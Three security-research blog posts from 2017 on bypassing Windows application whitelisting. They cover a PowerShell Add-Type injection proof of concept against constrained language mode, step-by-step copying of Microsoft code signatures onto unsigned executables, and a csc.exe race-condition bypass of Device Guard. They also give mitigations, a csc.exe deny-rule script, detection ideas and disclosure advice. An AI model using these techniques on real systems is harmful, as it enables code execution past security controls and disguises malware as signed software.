Tuesday, August 29, 2017

Exploiting PowerShell Code Injection Vulnerabilities to Bypass Constrained Language Mode

Introduction


Constrained language mode is an extremely effective method of preventing arbitrary unsigned code execution in PowerShell. It’s most realistic enforcement scenarios are when Device Guard or AppLocker are in enforcement mode because any script or module that is not approved per policy will be placed in constrained language mode, severely limiting an attackers ability to execute unsigned code. Among the restrictions imposed by constrained language mode is the inability to call Add-Type. Restricting Add-Type makes sense considering it compiles and loads arbitrary C# code into your runspace. PowerShell code that is approved per policy, however, runs in “full language” mode and execution of Add-Type is permitted. It turns out that Microsoft-signed PowerShell code calls Add-Type quite regularly. Don’t believe me? Find out for yourself by running the following command:

ls C:\* -Recurse -Include '*.ps1', '*.psm1' |
  Select-String -Pattern 'Add-Type' |
  Sort Path -Unique |
  % { Get-AuthenticodeSignature -FilePath $_.Path } |
  ? { $_.SignerCertificate.Subject -match 'Microsoft' }

Exploitation


Now, imagine if the following PowerShell module code (pretend it’s called “VulnModule”) were signed by Microsoft:

$Global:Source = @'
public class Test {
    public static string PrintString(string inputString) {
        return inputString;
    }
}
'@

Add-Type -TypeDefinition $Global:Source

Any ideas on how you might influence the input to Add-Type from constrained language mode? Take a minute to think about it before reading on.

Alright, let’s think the process through together:
  1. Add-Type is passed a global variable as its type definition. Because it’s global, its scope is accessible by anyone, including us, the attacker.
  2. The issue though is that the signed code defines the global variable immediately prior to calling to Add-Type so even if we supplied our own malicious C# code, it would just be overwritten by the legitimate code.
  3. Did you know that you can set read-only variables using the Set-Variable cmdlet? Do you know what I’m thinking now?

Weaponization


Okay, so to inject code into Add-Type from constrained language mode, an attacker needs to define their malicious code as a read-only variable, denying the signed code from setting the global “Source” variable. Here’s a weaponized proof of concept:

Set-Variable -Name Source -Scope Global -Option ReadOnly -Value @'
public class Injected {
    public static string ToString(string inputString) {
        return inputString;
    }
}
'@

Import-Module VulnModule

[Injected]::ToString('Injected!!!')

A quick note about weaponization strategies for Add-Type injection flaws. One of the restrictions of constrained language mode is that you cannot call .NET methods on non-whitelisted classes with two exceptions: properties (which is just a special “getter” method) and the ToString method. In the above weaponized PoC, I chose to implement a static ToString method because ToString permits me to pass arguments (a property getter does not). I also made my class static because the .NET class whitelist only applies when instantiating objects with New-Object.

So did the above vulnerable example sound contrived and unrealistic? You would think so but actually Microsoft.PowerShell.ODataAdapter.ps1 within the Microsoft.PowerShell.ODataUtils module was vulnerable to this exact issue. Microsoft fixed this issue in either CVE-2017-0215, CVE-2017-0216, or CVE-2017-0219. I can’t remember, to be honest. Matt Nelson and I reported a bunch of these injection bugs that were serviced by the awesome PowerShell team.

Prevention


The easiest way to prevent this class of injection attack is to supply a single-quoted here-string directly to -TypeDefinition in Add-Type. Single quoted string will not expand any embedded variables or expressions. Of course, this scenario assumes that you are compiling static code. If you must supply dynamically generated code to Add-Type, be exceptionally mindful of how an attacker might influence its input. To get a sense of a subset of ways to influence code execution in PowerShell watch my “Defensive Coding Strategies for a High-Security Environment” talk that I gave at PSConf.EU.

Mitigation


While Microsoft will certainly service these vulnerabilities moving forward, what is to prevent an attacker from bringing the vulnerable version along with them?

A surprisingly effective blacklist rule for UMCI bypass binaries is the FileName rule which will block execution based on the filename present in the OriginalFilename field within the “Version Info” resource in a PE. A PowerShell script is obviously not a PE file though - it’s a text file so the FileName rule won’t apply. Instead, you are forced to block the vulnerable script by its file hash using a Hash rule. Okay… what if there is more than a single vulnerable version of the same script? You’ve only blocked a single hash thus far. Are you starting to see the problem? In order to effectively block all previous vulnerable versions of the script, you must know all hashes of all vulnerable versions. Microsoft certainly recognizes that problem and has made a best effort (considering they are the ones with the resources) to scan all previous Windows releases for vulnerable scripts and collect the hashes and incorporate them into a blacklist here. Considering the challenges involved in blocking all versions of all vulnerable scripts by their hash, it is certainly possible that some might fall through the cracks. This is why it is still imperative to only permit execution of PowerShell version 5 and to enable scriptblock logging. Lee Holmes has an excellent post on how to effectively block older versions of PowerShell in his blog post here.

Another way in which a defender might get lucky regarding vulnerable PowerShell script blocking is due to the fact that most scripts and binaries on the system are catalog signed versus Authenticode signed. Catalog signed means that rather than the script having an embedded Authenticode signature, its hash is stored in a catalog file that is signed by Microsoft. So when Microsoft ships updates, eventually, hashes for old versions will fall out and no longer remain “signed.” Now, an attacker could presumably also bring an old, signed catalog file with them and insert it into the catalog store. You would have to be elevated to perform that action though and by that point, there are a multitude of other ways to bypass Device Guard UMCI. As a researcher seeking out such vulnerable scripts, it is ideal to first seek out potentially vulnerable scripts that have an embedded Authenticode signature as indicated by the presence of the following string - “SIG # Begin signature block”. Such bypass scripts exist. Just ask Matt Nelson.

Reporting


If you find a bypass, report it to secure@microsoft.com and earn yourself a CVE. The PowerShell team actively addresses injection flaws, but they are also taking making proactive steps to mitigate many of the primitives used to influence code execution in these classes of bug.

Conclusion


While constrained language mode remains an extremely effective means of preventing unsigned code execution, PowerShell and it’s library of signed modules/scripts remain to be a large attack surface. I encourage everyone to seek out more injection vulns, report them, earn credit via formal MSRC acknowledgements, and make the PowerShell ecosystem a more secure place. And hopefully, as a writer of PowerShell code, you’ll find yourself thinking more often about how an attacker might be able to influence the execution of your code.

Now, everything that I just explained is great but it turns out that any call to Add-Type remains vulnerable to injection due to a design issue that permits exploiting a race condition. I really hope that continuing to shed light on these issues, Microsoft will considering addressing this fundamental issue.

Monday, August 28, 2017

Application of Authenticode Signatures to Unsigned Code

Attackers have been known to apply legitimate digital certificates to their malware, presumably, to evade basic signature validation utilities. This was the case with the Petya ransomware. As a reverse engineer or red team capability developer, it is important to know the methods in which legitimate signatures can be applied to otherwise unsigned, attacker-supplied code. This blog post will give some background on code signing mechanisms, digital signature binary formats, and finally, techniques describing the application of digital certificates to an unsigned PE file. Soon, you will also see why these techniques are even more relevant in research that I will be releasing next month.

Background


What does it mean for a PE file (exe, dll, sys, etc.) to be signed? The simple answer to many is to open up the file properties on a PE and if a “Digital Signatures” tab is present, it means it was signed. When you see that the “Digital Signatures” tab is present on a file, it actually means that the PE file was Authenticode signed, which means within the file itself there is a binary blob of data consisting of a certificate and a signed hash of the file (more specifically, the Authenticode hash which doesn’t consider certain parts of the PE header in the hash calculation). The format in which an Authenticode signature is stored is documented in the PE Authenticode specification.


Many files that one would expect to be signed, however, (for example, consider notepad.exe) do not have a “Digital Signatures” tab. Does this mean that the file isn’t signed and that Microsoft is actually shipping unsigned code? Well, it depends. While notepad.exe does not have an Authenticode signature embedded within itself, in reality, it was signed via another means - catalog signing. Windows contains a catalog store consisting of many catalog files that are basically just a list of Authenticode hashes. Each catalog file is then signed to attest that any files with matching hashes originated from the signer of the catalog file (which is Microsoft in almost all cases). So while the Explorer UI does not attempt to lookup catalog signatures, pretty much any other signature verification tool will perform catalog lookups - e.g. Get-AuthenticodeSignature in PowerShell and Sysinternals Sigcheck.

Note: The catalog file store is located in %windir%\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}



In the above screenshot, the SignatureType property indicates that notepad.exe is catalog signed. What is also worth noting is the IsOSBinary property. While the implementation is not documented, this will show “True” if a signature chains to one of several known, hashed Microsoft root certificates. Those interested in learning more about how this works should reverse the CertVerifyCertificateChainPolicy function.

Sigcheck with the “-i” switch will perform catalog certificate validation and also display the catalog file path that contains the matching Authenticode hash. The “-h” switch will also calculate and display the SHA1 and SHA256 Authenticode hashes of the PE file (PESHA1 and PE256, respectively):

sigcheck -q -h -i C:\Windows\System32\notepad.exe
c:\windows\system32\notepad.exe:
  Verified:       Signed
  Catalog:        C:\WINDOWS\system32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-shell~31bf3856ad364e35~amd64~~10.0.15063.0.cat
  Signers:
    Microsoft Windows
      Status:         Valid
      Valid Usage:    NT5 Crypto, Code Signing
      Serial Number:  33 00 00 01 06 6E C3 25 C4 31 C9 18 0E 00 00 00 00 01 06
      Thumbprint:     AFDD80C4EBF2F61D3943F18BB566D6AA6F6E5033
      Algorithm:      1.2.840.113549.1.1.11
      Valid from:     1:39 PM 10/11/2016
      Valid to:       1:39 PM 1/11/2018
    Microsoft Windows Production PCA 2011
      Status:         Valid
      Valid Usage:    All
      Serial Number:  61 07 76 56 00 00 00 00 00 08
      Thumbprint:     580A6F4CC4E4B669B9EBDC1B2B3E087B80D0678D
      Algorithm:      1.2.840.113549.1.1.11
      Valid from:     11:41 AM 10/19/2011
      Valid to:       11:51 AM 10/19/2026
    Microsoft Root Certificate Authority 2010
                Status:         Valid
                Valid Usage:    All
                Serial Number:  28 CC 3A 25 BF BA 44 AC 44 9A
                                9B 58 6B 43 39 AA
                Thumbprint:     3B1EFD3A66EA28B16697394703A72CA340A05BD5
                Algorithm:      1.2.840.113549.1.1.11
                Valid from:     2:57 PM 6/23/2010
                Valid to:       3:04 PM 6/23/2035
    Signing date:   1:02 PM 3/18/2017
    Counter Signers:
      Microsoft Time-Stamp Service
        Status:         Valid
        Valid Usage:    Timestamp Signing
        Serial Number:  33 00 00 00 B3 39 BB D4 12 93 15 A9 FE 00 00 00 00 00 B3
        Thumbprint:     BEF9C1F4DA0F153FF0900303BE78A59ADA8ADCB9
        Algorithm:      1.2.840.113549.1.1.11
        Valid from:     10:56 AM 9/7/2016
        Valid to:       10:56 AM 9/7/2018
      Microsoft Time-Stamp PCA 2010
        Status:         Valid
        Valid Usage:    All
        Serial Number:  61 09 81 2A 00 00 00 00 00 02
        Thumbprint:     2AA752FE64C49ABE82913C463529CF10FF2F04EE
        Algorithm:      1.2.840.113549.1.1.11
        Valid from:     2:36 PM 7/1/2010
        Valid to:       2:46 PM 7/1/2025
      Microsoft Root Certificate Authority 2010
        Status:         Valid
        Valid Usage:    All
        Serial Number:  28 CC 3A 25 BF BA 44 AC 44 9A 9B 58 6B 43 39 AA
        Thumbprint:     3B1EFD3A66EA28B16697394703A72CA340A05BD5
        Algorithm:      1.2.840.113549.1.1.11
        Valid from:     2:57 PM 6/23/2010
        Valid to:       3:04 PM 6/23/2035
    Publisher:      Microsoft Windows
    Description:    Notepad
    Product:        Microsoft« Windows« Operating System
    Prod version:   10.0.15063.0
    File version:   10.0.15063.0 (WinBuild.160101.0800)
    MachineType:    64-bit
    MD5:    F60A9D3A9461F68DE0FCCEBB0C6CB31A
    SHA1:   2302BA58181F3C4E1E44A47A7D214EE9397CF2BA
    PESHA1: ACCE8ADCE9DDDE507EAE295DBB37683CA272DB9E
    PE256:  0C67E3923EDA8154A89ADCA8A6BF47DF7C07D40BB41963DEB16ACBCF2E54803E
    SHA256: C84C361B7F5DBAEAC93828E60D2B54704D3E7CA84148BAFDA632F9AD6CDC96FA
    IMP:    645E8D8B0AEA808FF16DAA70D6EE720E

Knowing the Authenticode hash allows you to look up the respective entry in the catalog file. You can double-click a catalog file to view its entries. I also wrote the CatalogTools PowerShell module to parse catalog files. The “hint” metadata field gives away that notepad.exe is indeed the corresponding entry:


Digital Signature Binary Format


Now that you have an understanding of the methods in which a PE file can be signed (Authenticode and catalog), it is useful to have some background on the binary format of signatures. Whether Authenticode signed or catalog signed, both signatures are stored as PKCS #7 signed data which is ASN.1 formatted binary data. ASN.1 is simply a standard that states how binary data of different data types should be stored. Before observing/parsing the bytes of a digital signature, you must first know how it is stored in the file. Catalog files are straightforward as the file itself consists of raw PKCS #7 data. There are online ASN.1 decoders that parse out ASN.1 data and present it in an intuitive fashion. For example, try loading the catalog file containing the hash for notepad.exe into the decoder and you will get a sense of the layout of the data. Here’s a snippet of the parsed output:


Each property within the ASN.1 encoded data begins with an object identifier (OID) - a unique numeric sequence that identifies the type of data that follows. The OIDs worth noting in the above snippet are the following:
  1. 1.2.840.113549.1.7.2 - This indicates that what follows is PKCS #7 signed data - the format expected for Authenticode and catalog-signed code.
  2. 1.3.6.1.4.1.311.12.1.1 - This indicates that what follows is catalog file hash data
It is worth spending time exploring all of the fields contained within a digital signature. All fields present are outside of the scope of this blog post, however. Additional crypto/signature-related OIDs are listed here.

Embedded PE Authenticode Signature Retrieval


The digital signature data in a PE file with an embedded Authenticode signature is appended to the end of the file (in a well-formatted PE file). The OS obviously needs a little bit more information than that though in order to retrieve the exact offset and size of the embedded signature. Let’s look at kernel32.dll in one of my favorite PE parsing/editing utilities: CFF Explorer.


The offset and size of the embedded digital signature is stored in the “security directory” offset within the “data directories” array within the optional header. The data directory contains offsets and size of various structures within the PE file - exports, imports, relocations, etc. All offsets within the data directory are relative virtual offsets (RVA) meaning they are the offset to the respective portion of the PE when loaded in memory. There is one exception though - the security directory which stores its offset as a file offset. The reason for this is because the Windows loader doesn’t actually load the content of the security directory in memory.

The binary data in the at the security directory file offset is a WIN_CERTIFICATE structure. Here’s what the structure for kernel32.dll looks like parsed out in 010 Editor (file offset 0x000A9600):


PE Authenticode signatures should always have a wRevision of WIN_CERT_TYPE_PKCS_SIGNED_DATA. The byte array that follows is the same PKCS #7, ASN.1 encoded signed data as was seen in the contents of a catalog file. The only difference is that you shouldn’t find the 1.3.6.1.4.1.311.12.1.1 OID, indicating the presence of catalog hashes.

Parsing out the raw bCertificate data in the online ASN.1 decoder confirms we’re dealing with proper PKCS #7 data:

Application of Digital Signatures to Unsigned PEs


Now that you have a basic idea of the binary format and storage locations of digital signatures, you can start applying existing signatures to your unsigned code.

Application of Embedded Authenticode Signatures


Applying an embedded Authenticode signature from a signed file to an unsigned PE file is quite straightforward. While the process can obviously be automated, I’m going to explain how to do it manually with a hex editor and CFF Explorer.

Step #1: Identify the Authenticode signature that you want to steal. In this example, I will use the one in kernel32.dll

Step #2: Identify the offset and size of the WIN_CERTIFICATE structure in the “security directory”


So the file offset in the above screenshot is 0x000A9600 and the size is 0x00003A68.

Step #3: Open kernel32.dll in a hex editor, select 0x3A68 bytes starting at offset 0xA9600, and then copy the bytes.


Step #4: Open your unsigned PE (HelloWorld.exe in this example) in a hex editor, scroll to the end, and paste the bytes copied from kernel32.dll. Take note of the file offset of the beginning of the signature (0x00000E00 in my case). Save the file after pasting in the signature.


Step #5: Open HelloWorld.exe in CFF Explorer and update the security directory to point to the digital signature that was applied: offset - 0x00000E00, size - 0x00003A68. Save the file after making the modifications. Ignore the “Invalid” warning. CFF Explorer doesn’t treat the security directory as a file offset and gets confused when it tries to reference what section the data resides in.


That’s it! Now, signature validation utilities will parse and display the signature properly. The only caveat is that they will report that the signature is invalid because the calculated Authenticode of the file does not match that of the signed hash stored in the certificate.

Now, if you were wondering why the SignerCertificate thumbprint values don’t match, then you are an astute reader. Considering we applied the identical signature, why doesn’t the certificate thumbprint match? That’s because Get-AuthenticodeSignature first attempts a catalog file lookup of kernel32.dll. In this case, it found a catalog entry for kernel32.dll and is displaying the signature information for the signer of the catalog file. kernel32.dll is also Authenticode signed though. To validate that the thumbprint values for the Authenticode hashes are identical, temporarily stop the CryptSvc service - the service responsible for performing catalog hash lookups. Now you will see that the thumbprint values match. This indicates that the catalog hash was signed with a different code signing certificate from the certificate used to sign kernel32.dll itself.

Application of a Catalog Signature to a PE File


Realistically, CryptSvc will always be running and catalog lookups will be performed. Suppose you want to be mindful of OPSEC and match the identical certificate used to sign your target binary. It turns out, you can actually apply the contents of a catalog file to an embedded PE signature by swapping out the contents of bCertificate in the WIN_CERTIFICATE structure and updating dwLength accordingly. Feel free to follow along as this is done. Note that our goal (in this case) is to apply an Authenticode signature to our unsigned binary that is identical to the one used to sign the containing catalog file: Certificate thumbprint AFDD80C4EBF2F61D3943F18BB566D6AA6F6E5033 in this case.

Step #1: Identify the catalog file containing the Authenticode hash of the target binary - kernel32.dll in this case. If a file is Authenticode signed, sigcheck will actually fail to resolve the catalog file. Signtool (included in the Windows SDK) will, however.


Step #2: Open the catalog file in in a hex editor and annotate the file size - 0x000137C7


Step #3: We’re going to manually craft a WIN_CERTIFICATE structure in a hex editor. Let’s go through each field we’ll supply:
  1. dwLength: This is the total length of the WIN_CERTIFICATE structure - i.e. bCertificate bytes plus the size of the other fields = 4 (size of DWORD) + 2 (size of WORD) + 2 (size of WORD) + 0x000137C7 (bCertificate - the file size of the .cat file) = 0x000137CF.
  2. wRevision: This will be 0x0200 to indicate WIN_CERT_REVISION_2_0.
  3. wCertificateType: This will be 0x0002 to indicate WIN_CERT_TYPE_PKCS_SIGNED_DATA.
  4. bCertificate: This will consist of the raw bytes of the catalog file.
When crafting the bytes in the hex editor, be mindful that the fields are stored in little-endian format.


Step #4: Copy all the bytes from the crafted WIN_CERTIFICATE, append them your unsigned PE, and update the security directory offset and size accordingly.


Now, assuming your calculations and alignments were proper, behold a thumbprint match with that of the catalog file!


Anomaly Detection Ideas


The techniques presented in this blog post have hopefully got some people thinking about how one might go about detecting the abuse of digital signatures. While I have not investigated signature heuristics thoroughly, let me just pose a series of questions that might motivate others to start investigating and writing detections for potential signature anomalies:
  • For a legitimately signed Microsoft PE, is there any correlation between the PE timestamp and the certificate validity period? Would the PE timestamp for attacker-supplied code deviate from the aforementioned correlation?
  • After reading this article, what is your level of trust in a “signed” file that has a hash mismatch?
  • How would you go about detecting a PE file that has an embedded Authenticode signature consisting of a catalog file? Hint: A specific OID mentioned earlier might be useful.
  • How might you go about validating the signature of a catalog-signed file on a different system?
  • What effect might a stopped/disabled CryptSvc service have on security products performing local signature validation? If that was to occur, then most system files, for all intents and purposes will cease to be signed.
  • Every legitimate PE I’ve seen is padded on a 0x10 byte boundary. The example I showed where I applied the catalog contents to an Authenticode signature is not 0x10 byte aligned.
  • How might you differentiate between a legitimate Microsoft digital signature and one where all the certificate attributes are applied to a self-signed certificate?
  • What if there is data appended beyond the digital signature? This has been abused in the past.
  • Threat intel professionals should find the Authenticode hash to be an interesting data point when investigating identical code with different certificates applied. VirusTotal supplies this as the "Authentihash" value: i.e. the hash value that was calculated with "sigcheck -h". If I were investigating variants of a sample that had more than one hit on a single Authentihash in VirusTotal, I would find that to be very interesting.

Monday, July 10, 2017

Bypassing Device Guard with .NET Assembly Compilation Methods

Tl;dr

This post will describe a Device Guard user mode code integrity (UMCI) bypass (or any other application whitelisting solution for that matter) that takes advantage of the fact the code integrity checks are not performed on any code that compiles C# dynamically with csc.exe. This issue was reported to Microsoft on November 14, 2016. Despite all other Device Guard bypasses being serviced, a decision was made to not service this bypass. This bypass can be mitigated by blocking csc.exe but that may not be realistic in your environment considering the frequency in which legitimate code makes use of these methods - e.g. msbuild.exe and many PowerShell modules that call Add-Type.

Introduction

When Device Guard enforces user mode code integrity (UMCI), aside from blocking non-whitelisted binaries, it also only permits the execution of signed scripts (PowerShell and WSH) approved per policy. The UMCI enforcement mechanism in PowerShell is constrained language mode. One of the features of constrained language mode is that unsigned/unapproved scripts are prevented from calling Add-Type as this would permit arbitrary code execution via the compilation and loading of supplied C#. Scripts that are approved per Device Guard code integrity (CI) policy, however, are under no such restrictions, execute in full language mode, and are permitted to call Add-Type. While investigating Device Guard bypasses, I considered targeting legitimate, approved calls to Add-Type. I knew that the act of calling Add-Type caused csc.exe – the C# compiler to drop a .cs file to %TEMP%, compile it, and load it. A procmon trace of PowerShell calling Add-Type confirms this:

Process Name Operation  Path
------------ ---------  ----
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\bfuswtq5.cmdline
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\bfuswtq5.0.cs
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\CSC3FBE068FE0A4C00B4A74B718FAE2E57.TMP
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\CSC3FBE068FE0A4C00B4A74B718FAE2E57.TMP
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\RES1A69.tmp
cvtres.exe   CreateFile C:\Users\TestUser\AppData\Local\Temp\CSC3FBE068FE0A4C00B4A74B718FAE2E57.TMP
cvtres.exe   CreateFile C:\Users\TestUser\AppData\Local\Temp\RES1A69.tmp
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\RES1A69.tmp
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\RES1A69.tmp
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\bfuswtq5.dll
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\CSC3FBE068FE0A4C00B4A74B718FAE2E57.TMP

Upon seeing these files created, I asked myself the following questions:
  1. Considering an approved (i.e. whitelisted per policy) PowerShell function is permitted to call Add-Type (as many Microsoft-signed module functions do), could I possibly replace the dropped .cs file with my own? Could I do so quickly enough to win that race?
  2. How is the .DLL that’s created loaded? Is it subject to code integrity (CI) checks?

Research methodology
Let’s start with the second question since exploitation would be impossible if CI would prevent the loading of a hijacked, unsigned DLL. To answer this question, I needed to determine what .NET methods were called upon Add-Type being called. This determination was relatively easy by tracing method calls in dnSpy. I quickly traced execution of the following .NET methods:
Once the Microsoft.CSharp.CSharpCodeGenerator.Compile method is called, this is where csc.exe is ultimately invoked. After the Compile method returns, FromFileBatch takes the compiled artifacts, reads them in as a byte array, and then loads them using System.Reflection.Assembly.Load(byte[], byte[], Evidence). This is the same method called by msbuild.exe when compiling inline tasks – a known Device Guard UMCI bypassed discovered by Casey Smith. Knowing this, I gained the confidence that if I could hijack the dropped .cs file, I would end up having a constrained language mode bypass, allowing arbitrary unsigned code execution. What we’re referring to here is known as a “time of check time of use” (TOCTOU) attack. If I could manage to replace the dropped .cs file with my own prior to csc.exe consuming it, then I would win that race and perform the bypass. The only constraints imposed on me, however, would be that I would need to write a hijack payload within the constraints of constrained language mode. As it turns out, I was successful.

Exploitation

I wrote a function called Add-TypeRaceCondition that will accept attacker-supplied C# and get an allowed call to Add-Type to compile it and load it within the constraints of constrained language mode. The weaponized bypass is roughly broken down as follows:
  1. Spawn a child process of PowerShell that constantly tries to drop the malicious .cs file to %TEMP%.
  2. Maximize the process priority of the child PowerShell process to increase the likelihood of winning the race.
  3. In the parent PowerShell process, import a Microsoft-signed PowerShell module that calls Add-Type – I chose the PSDiagnostics process for this.
  4. Kill the child PowerShell process.
  5. At this point, you will have likely won the race and your type will be loaded in place of the legitimate one expected by PSDiagnostics.
In reality, the payload wins the race a little more than 50% of the time. If Add-TypeRaceCondition doesn’t work on the first try, it will almost always work on the second try.

Do note that while I weaponized this bypass for PowerShell, this can be weaponized using anything that would allow you to overwrite the dropped .cs file quickly enough. I've weaponized the bypass using a batch script, VBScript, and with WMI. I'll leave it up to the reader to implement a bypass using their language of choice.

Operational Considerations

It's worth noting that while an application whitelisting bypass is just that, it also serves as a method of code execution that is likely to evade defenses. In this bypass, an attacker need only drop a C# file to disk which results in the temporary creation of a DLL on disk which is quickly deleted. Depending upon the payload used, some anti-virus solutions with real-time scanning enabled could potentially have the ability to quarantine the dropped DLL before it's consumed by System.Reflection.Assembly.Load.

Prevention

Let me first emphasize that this is a .NET issue, not a PowerShell issue. PowerShell was simply chosen as a convenient means to weaponize the bypass. As I’ve already stated, this issue doesn’t just apply to when PowerShell calls Add-Type, but when any application calls any of the CodeDomProvider.CompileAssemblyFrom methods. Researchers will continue to target signed applications that make such method calls until this issue is mitigated.

A possible user mitigation for this bypass would be to block csc.exe with a Device Guard rule. I would personally advise against this, however, since there are many legitimate Add-Type calls in PowerShell and presumably in other legitimate applications. I’ve provided a sample Device Guard CI rule that you can merge into your policy if you like though. I created the rule with the following code:

# Copy csc.exe into the following directory
# csc.exe should be the only file in this directory.
$CSCTestPath = '.\Desktop\ToBlock\'
$PEInfo = Get-SystemDriver -ScanPath $CSCTestPath -UserPEs -NoShadowCopy

$DenyRule = New-CIPolicyRule -Level FileName -DriverFiles $PEInfo -Deny
$DenyRule[0].SetAttribute('MinimumFileVersion', '65535.65535.65535.65535')

$CIArgs = @{
    FilePath = "$($CSCTestPath)block_csc.xml"
    Rules = $DenyRule
    UserPEs = $True
}

New-CIPolicy @CIArgs

Detection

Unfortunately, detection using free, off-the-shelf tools will be difficult due to the fact that the disk artifacts are created and subsequently deleted and by the nature of System.Reflection.Assembly.Load(byte[]) not generating a traditional module load event that something like Sysmon would be able to detect.

Vendors with the ability to hash files on the spot should consider assessing the prevalence of DLLs created by csc.exe. Files with low prevalence should be treated as suspicious. Also, unfortunately, since dynamically created DLLs by their nature will not be signed, there will be no code signing heuristics to key off of.

It's worth noting that I intentionally didn't mention PowerShell v5 ScriptBlock logging as a detection option since PowerShell isn't actually required to achieve this bypass.

Conclusion

I remain optimistic of Device Guard’s ability to enforce user mode code integrity. It is a difficult problem to tackle, however, and there is plenty of attack surface. In most cases, Device Guard UMCI bypasses can be mitigated by a user in the form of CI blacklist rules. Unfortunately, in my opinion, no realistic user mitigation of this particular bypass is possible. Microsoft not servicing such a bypass is the exception and not the norm. Please don’t let this discourage you from reporting any bypasses that you may find to secure@microsoft.com. It is my hope that by releasing this bypass that it will eventually be addressed and it will provide other vendors with the opportunity to mitigate.

Previously serviced bypasses for reference: